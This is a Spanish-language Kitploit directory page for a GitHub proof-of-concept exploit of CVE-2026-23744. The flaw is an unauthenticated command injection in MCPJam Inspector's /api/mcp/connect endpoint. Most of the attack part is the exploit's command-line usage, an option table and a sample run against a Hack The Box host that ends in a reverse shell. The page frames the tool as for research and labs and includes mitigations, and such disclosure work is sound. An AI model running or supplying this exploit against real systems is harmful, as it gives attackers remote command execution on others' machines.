Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON diseñada para ejecutar comandos arbitrarios, otorgando una shell inversa con PTY. | Kitploit
Herramientas/GitHubGitHub/amao26/cve-2026-23744-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubamao26/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON diseñada para ejecutar comandos arbitrarios, otorgando una shell inversa con PTY.

Ver Repositorio
hace 9 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744-PoC

Aviso legal:

Esta prueba de concepto se proporciona exclusivamente para investigación de seguridad autorizada, fines educativos y entornos de laboratorio controlados (p. ej., HTB, CTF o pruebas de penetración internas con consentimiento explícito por escrito). El uso no autorizado contra cualquier sistema sin permiso es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso; los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.


Descripción

CVE-2026-23744 es una vulnerabilidad de inyección de comandos no autenticada en MCPJam Inspector (versión ≤ 1.4.2).
El endpoint /api/mcp/connect acepta una carga útil JSON con serverConfig.command y serverConfig.args y los pasa directamente a la creación de un proceso del sistema sin ninguna sanitización. Un atacante puede enviar una solicitud manipulada para ejecutar comandos arbitrarios del sistema, obteniendo una reverse shell con los privilegios del usuario del servicio.

Este repositorio contiene un script de exploit completo y funcional con un listener interactivo automático opcional basado en PTY (habilitado por defecto).


Requisitos

  • Python 3.6+
  • Librería requests (pip install requests)

Uso

Importante: Proporcione solo el hostname o la IP. El script añade automáticamente http:// o https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]

Ejemplo

El script inicia su propio listener y le proporciona una shell directamente en su terminal.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Prueba de Concepto (Ejecución Exitosa)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Mitigación

  • Sanitice todos los argumentos proporcionados por el usuario que se pasen a funciones de creación de procesos.
  • No permita la ejecución arbitraria de comandos a través de endpoints de API sin una lista blanca estricta y autenticación.
  • Ejecute los servicios con los menores privilegios posibles – nunca como root.

Licencia

Este repositorio es solo para fines educativos y de pruebas autorizadas. Úselo bajo su propio riesgo.

Autor: amao26
Fecha: Agosto de 2026

Descargar herramienta
OpciónDescripción
-t, --targetHostname o IP del objetivo (obligatorio)
-p, --portPuerto del objetivo (por defecto: 6274)
-l, --lhostSu IP para la reverse shell (obligatorio)
-r, --lportPuerto de su listener (por defecto: 4444)
--sslUsar HTTPS en lugar de HTTP
--check-onlySolo comprobar la vulnerabilidad, sin enviar la shell